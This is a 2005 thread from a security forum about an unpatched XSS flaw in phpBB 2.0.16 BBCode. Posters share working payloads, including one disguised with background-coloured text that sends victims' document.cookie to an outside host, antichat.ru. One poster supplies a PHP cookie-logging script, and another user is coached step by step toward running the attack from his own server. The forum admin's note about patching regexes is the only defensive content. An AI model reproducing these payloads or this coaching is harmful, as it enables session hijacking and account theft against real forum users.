|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit |
|
Posted: Fri Jul 08, 2005 8:11 pm |
|
|
zer0-c00l |
Advanced user |
|
|
Joined: Jun 25, 2004 |
Posts: 72 |
Location: BRAZIL! |
|
|
|
|
|
|
|
|
|
|
Posted: Sat Jul 09, 2005 2:36 pm |
|
|
verbatim |
Regular user |
|
|
Joined: Jul 09, 2005 |
Posts: 11 |
|
|
|
|
|
|
|
waouh, a new flaw in phpBB !
i'm totally new in XSS Remote Cookie exploit, would you be kind to explain me (personnaly or with a good tutorial) how to use this exploit ?
thank you in advance. |
|
|
|
|
Posted: Sat Jul 09, 2005 9:01 pm |
|
|
diaga |
Regular user |
|
|
Joined: Jun 27, 2005 |
Posts: 22 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jul 10, 2005 12:28 am |
|
|
WaterBird |
Active user |
|
|
Joined: May 16, 2005 |
Posts: 37 |
|
|
|
|
|
|
|
Hmm posted and nothing happening :/ |
|
|
|
|
Posted: Sun Jul 10, 2005 2:35 am |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Posted: Sun Jul 10, 2005 5:39 am |
|
|
g30rg3_x |
Active user |
|
|
Joined: Jan 23, 2005 |
Posts: 31 |
Location: OutSide Of The PE |
|
|
|
|
|
|
First...
The Cross Site Scripting (aka XSS) bugs
just can executes in the client side
So...
This is not a simply bug that you execute and you get the admin hash
And What Can I Do With This???
You can send a exploit like /str0ke put in milw0rm, of course via pm and you can steal his cookie when it open de PM..
of course as you can read this bug just works with IE and not with others explorers
Can You Give a Poc??
umm the original ho is in russ give to PoC's
The first that prints a JS Alert with message lol
Code: |
[url]www.[url=www.s=''style='top:expression(eval(this.sss));'sss=`alert('lol');this.sss=null`s='][/url][/url]'
|
The second steal a cookie, but you have to put the value of backgrounf inn the place were it comes ЦВЕТ_ФОНА
Code: |
[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
|
obviously like the str0ke bug you have to redirrect as your website for stealing the cookie:
http://antichat.ru/b.gif
so thats all about it
i think this info wold be very useful for some people
if you have questions you can answer here or by my msn..
regards
PD: There is no official patch so have fun... |
|
|
|
|
|
|
|
|
Posted: Sun Jul 10, 2005 7:45 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
another bbcode flaw combination with Social engineering ,I think *_^ |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
|
|
|
Posted: Sun Jul 10, 2005 8:54 am |
|
|
verbatim |
Regular user |
|
|
Joined: Jul 09, 2005 |
Posts: 11 |
|
|
|
|
|
|
|
First, thank you for your answers and your help !
yes, i had read it (even if i don't speak russian ).
g30rg3_x wrote: |
of course as you can read this bug just works with IE and not with others explorers
|
now i understant why i couldn't see it. lol
g30rg3_x wrote: |
The second steal a cookie, but you have to put the value of backgrounf inn the place were it comes ЦВЕТ_ФОНА
Code: |
[color=ЦВЕТ_ФОНА][url]www.ut[url=www.s=''style='font-size:0;color:ЦВЕТ_ФОНА'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
|
obviously like the str0ke bug you have to redirrect as your website for stealing the cookie:
http://antichat.ru/b.gif
|
humm, i've 2 questions...
1- the color ЦВЕТ_ФОНА... ... this value has to be changed with a color of the target forum, probably to hide the script... but what color ? you said the backgrounf inn but i don't understand...
2- to redirect to our script stealer, by changing the http://antichat.ru/cgi-bin/s.jpg? url... : how to create our own cookie stealer ?
by the way, g30rg3_x, did you manage to use this exploit ?
thank you in advance. |
|
|
|
|
|
|
|
|
Posted: Sun Jul 10, 2005 10:24 am |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
|
Last edited by subzero on Sun Jul 10, 2005 1:55 pm; edited 1 time in total |
|
|
|
Posted: Sun Jul 10, 2005 11:20 am |
|
|
verbatim |
Regular user |
|
|
Joined: Jul 09, 2005 |
Posts: 11 |
|
|
|
|
|
|
|
great video subzero !
1- i still wonder... when you write
Quote: | template color,so no one can see it.
// you can do it.. by viewing page source code. |
the template has many color... wich one do you mean ?
2- how to have our own cookies stealer script rather to depend on antichat.ru
again ?
thank you. |
|
|
|
|
Posted: Sun Jul 10, 2005 11:48 am |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
about viewing source code. oohh .. too many aa..
well forget bout it.
2. some code
for cookies stealer
<?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?>
|
|
|
|
|
|
|
|
|
Posted: Sun Jul 10, 2005 12:20 pm |
|
|
verbatim |
Regular user |
|
|
Joined: Jul 09, 2005 |
Posts: 11 |
|
|
|
|
|
|
|
ok, so imagine
1- i create a file cookie.php with inside :
Code: | <?
if(isset($_GET["c"]))
{
$file = fopen("cookies.txt", "a");
fwrite($file, $_GET["c"]."\n");
fclose($file);
}
?> |
2- i change url of the exploit :
Code: | [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] |
i tried to replace http://antichat.ru/cgi-bin/s.jpg? by http://mysite.com/cookie.php
but it creates no cookies.txt file, there's probably something wrong in my syntax |
|
|
|
|
|
|
|
|
Posted: Sun Jul 10, 2005 12:21 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
I was testing this bbcode flaw yesterday and it worked even here, at waraxe.us
Some remarks:
1. it will work with IE only (no Firefox, etc ...)
2. phpBB team has no clue about this and so most of the phpbb installations in the world are affected.
3. I was making some simple changes to bbcode regexes, so right now this forum is (hopefully) protected from specific exploit.
It's interesting to see, how much time it takes to phpBB developement team to release phpBB version 2.0.17 |
|
|
|
|
Posted: Sun Jul 10, 2005 12:30 pm |
|
|
subzero |
Valuable expert |
|
|
Joined: Mar 16, 2005 |
Posts: 42 |
|
|
|
|
|
|
|
verbatim
have u set chmod 777 to the cookies.txt ?
its good if you release the patch for it.
waraxe.. one of mysite.. vulnerable too. |
|
|
|
|
Posted: Sun Jul 10, 2005 12:44 pm |
|
|
verbatim |
Regular user |
|
|
Joined: Jul 09, 2005 |
Posts: 11 |
|
|
|
|
|
|
|
subzero wrote: | verbatim
have u set chmod 777 to the cookies.txt ? |
yes i have... but this file is still empty
any ideas ?
is there a mistake here :
Code: | [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookie.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] |
finally, did you manage to use this exploit with a personnal stealer script ?
(i know, a lot of question, but i guess it may help other readers ) |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 8
Goto page 1, 2, 3, 4, 5, 6, 7, 8Next
|
|
|
|
|
|
Powered by phpBB � 2001-2008 phpBB Group
|
|
|
|
|